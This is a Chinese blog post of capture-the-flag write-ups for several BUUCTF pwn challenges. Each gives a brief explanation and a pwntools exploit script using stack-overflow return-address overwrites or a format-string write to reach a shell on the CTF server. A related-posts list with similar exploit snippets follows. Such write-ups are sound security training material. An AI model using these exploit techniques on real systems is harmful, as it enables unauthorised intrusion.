BUU-pwn(一)

已于 2022-04-26 21:09:01 修改
阅读量346 收藏 1
点赞数
分类专栏: pwn 文章标签: wp
于 2022-04-24 00:40:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53263789/article/details/123927104
版权

rip

简单栈溢出,后门函数
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25253)

payload=b'a'*0xf+b'a'*0x08+p64(0x0401187)
r.sendline(payload)
r.interactive()

warmup_csaw_2016

后门函数 int sub_40060D() 泄露地址
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',29416)
r.recvuntil('WOW:')

addr = int(r.recv(8),16)
print(addr)
payload=b'a'*0x40+b'a'*0x8+p64(addr)
r.sendlineafter('>',payload)
r.interactive()

ciscn_2019_n_1

在这里插入图片描述
使用 IEEE 754浮点数十六进制相互转换 转换地址
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25891)

payload=b'a'*(0x30-0x4)+p64(0x41348000)
r.sendlineafter('Let\'s guess the number.',payload)
r.interactive()

pwn1_sctf_2016

有后门函数
s开辟了3C空间,但是fgets只能读32字节,最后的strcpy利用之间的将 I 转为 you 长度直接变大造成溢出
在这里插入图片描述
exp

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',28969)
#0x14 = 20字节长度
payload=b'I'*(0x14)+b'a'*0x4+p32(0x8048f0d)
r.sendline(payload)
r.interactive()

jarvisoj_level0

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',27802)

payload=b'a'*(0x80)+b'a'*0x8+p64(0x0400596)
r.sendlineafter('Hello, World\n',payload)
r.interactive()

[第五空间2019 决赛]PWN5

格式化控制passwd

偏移量为10

passwd地址为 0804C044 长度为 4
在这里插入图片描述

from pwn import *
#io=process("./pwn")
r = remote('node4.buuoj.cn',25323)

payload=p32(0x804c044)+p32(0x804c045)+p32(0x804c046)+p32(0x804c047)
payload+=b'%10$n%11$n%12$n%13$n'

r.sendline(payload)
r.sendline(str(0x10101010))
r.interactive()
Blazing-Angel
关注
专栏目录
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 653
写题笔记
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1017
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUU PWN(一)
playmaker的博客
01-28 2210
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buupwn1_sctf_2016
xieyichensss的博客
03-18 777
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
buu_pwn
王富贵同学的博客
09-29 2036
warmup_csaw_2016 明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
BUU-pwn(二)
Blazing-Angel的博客
04-27 339
ciscn_2019_n_8 32位程序,逻辑很简单 需要var[13] == 17 需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64 exp from pwn import * r = remote('node4.buuoj.cn',29396) payload = b'aaaa'*13+p64(0x11) r.sendline(p
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1843
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 722
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
BUUCTF-pwn刷题记录(22-7-30更新)
Morphy_Amo的博客
03-04 4367
BUUCTF刷题记录
BUUCTF-Pwn-[第五空间2019 决赛]PWN5
餐桌上的猫
02-15 398
题目截图 检查文件信息 这是一个32位的程序,开启了NX和Canary 用IDA打开查看找到来能getshell的代码 反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell 测试我们输入的内容在栈中的位置,是第10个 exp from pwn import* r=remote('node4.buuoj.cn',28850) addr=
BUU PWN (二)
playmaker的博客
02-07 881
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
BUU-pwn(四)
Blazing-Angel的博客
09-04 194
BUU-pwn(四)
BUU-pwn1_sctf_2016
qq_45771413的博客
04-27 364
今天补牙,帮学弟改大创,以前的题目还没来得及整理,先补票buu部分的入门pwn题ಥ_ಥ 查看保护 IDA 说来惭愧,太久没做C++写的题现在快看不懂了……只能看出来提示输入,有个I和you的处理,然后将变换拷贝回输入变量,输出 寻找敏感调用: 在字符串查找里找到了全家桶: 解题 这里因为不知道中间咋处理的,直接莽,想溢出s。但是发现s虽然要求输入32,但是栈空间有3C(60位),显然无法溢出。想通过v0搞事情,发现v0是char,而且是地址,显然无法利用……预计关键就在中间的那一串看不懂的了。 在一堆
BUU-pwn(三)
Blazing-Angel的博客
06-19 306
pwn(三)
BUU刷题-Pwn-test
一个啥也不会的小菜鸡!
07-13 104
直接执行即可,获得主机权限!
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 257
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
pwn入门-buu刷题第二页题解(32道)(更新完毕,下一章见)
2303_79366759的博客
03-21 1117
通过控制返回地址来执行程序执行流的变化,也即是说我们并不是在执行我们写入在bss段的代码,因为真正的代码不是写作bss段的,应该位于text段。OK那我们接着讲,我们可以在s的地址里写入ret2libc的代码,然后执行它,泄露libc的基地址后再跳转回来,再用one_gadget来getshell,之前已经写过一道栈迁移的题目了,所以在这里就不多加赘述了。由代码易知,这个函数的功能是先搜索flag.txt文件,如果找到了则打印出来,如果没找到则退出程序,再看一下vuln函数里面有什么。
buuctf-pwn1 sctf 2016
weixin_45427676的博客
09-20 738
拿到文件后checksec一下,发现开启了NX保护,说明堆栈不可执行,那我们就不能向堆栈上写东西。 查看一下程序 main()函数调用了vuln()函数,查看一下此函数有没有什么漏洞可以利用,enmenm,发现代码很多不知道什么意思(太菜了太菜了),好好看看这些代码到底啥意思吧~~,部分代码注释如下: 本来看到代码5处,想着能通过向缓冲区S中写入数据,利用栈溢出来覆盖返回地址为后门函数地址,但是fgets()函数告诉我此法不行,因为你最多只能向S中输入32个字符,而缓冲区S的大小为0x3c,也就是需要输入
pwn入门-buu刷题第三页题解(32道)(更新完毕,下一章见)
最新发布
2303_79366759的博客
07-27 1165
这个0x400A28的位置,然后程序就会根据我们rbp的值再加上一些偏移,赋值给rsi,最后实现往0x123000+偏移的地方写值,但是这里的0x38的字长,再加上偏移还是不够我们写orw,所以我们可以再执行一次read,来获取更多的字长,然后如果在调试时发现位置不对的话,可以通过nop滑梯滑到正确的地方执行orw。即可getshell。通过unlink,我们可以改变itemlist里面的值的内容,从而来改变show的位置,然后再泄露libc_base,然后由于这道题的got表还是可写的,那么随便打了。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值